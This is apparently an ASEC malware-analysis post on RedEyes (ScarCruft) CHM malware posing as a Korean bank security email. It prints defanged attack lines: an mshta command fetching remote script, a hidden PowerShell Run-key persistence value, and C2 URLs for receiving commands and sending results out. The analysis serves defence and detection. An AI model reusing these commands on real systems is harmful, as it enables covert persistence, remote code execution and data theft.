CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)

ASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, which was reported back in February, has the same format as the command used in this attack. This information, as well as the details of the CHM malware’s operation process, is described in the following post.

HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)

When the CHM file is executed, it displays a Help screen disguised as a security email from a Korean financial company. The malicious script that exists within the CHM is activated during this process, making it difficult for users to notice. There has been a recent increase in malware distribution using CHM.

Help screen disguised as a security email

The malicious script that’s executed is shown below, and, like the other CHM malware introduced in the past, it also uses a shortcut object (ShortCut). The shortcut object is called through the Click method, and the command under the Item1 entry is executed. This file executes an additional script that exists within a certain URL through the mshta process.

  • Executed Command
    mshta.exe hxxp://shacc[.]kr/skin/product/1.html
Malicious script within CHM

The “1.html” file executed through the mshta process contains a JS (JavaScript) code. This code is responsible for executing the encoded PowerShell commands. The PowerShell command executed here has a similar format as the command used during the aforementioned M2RAT attack process.

1.html file code
Process tree

An examination of the decoded PowerShell command revealed that everything aside from the C2 address, the file name under which the command execution results are saved, and the registry value, has the same code as the command used back in February. This command is responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results.

  • RUN Key Registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 || mshta hxxp://shacc[.]kr/skin/product/1.html
  • C2
    hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s commands
    hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command execution results
Decoded PowerShell command

When a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading files and extorting information according to the threat actor’s commands. In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Trojan/CHM.Agent (2023.03.03.03)


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating

Inline Feedbacks
View all comments

[…] post CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) appeared first on ASEC […]


[…] CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) […]


[…] CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) […]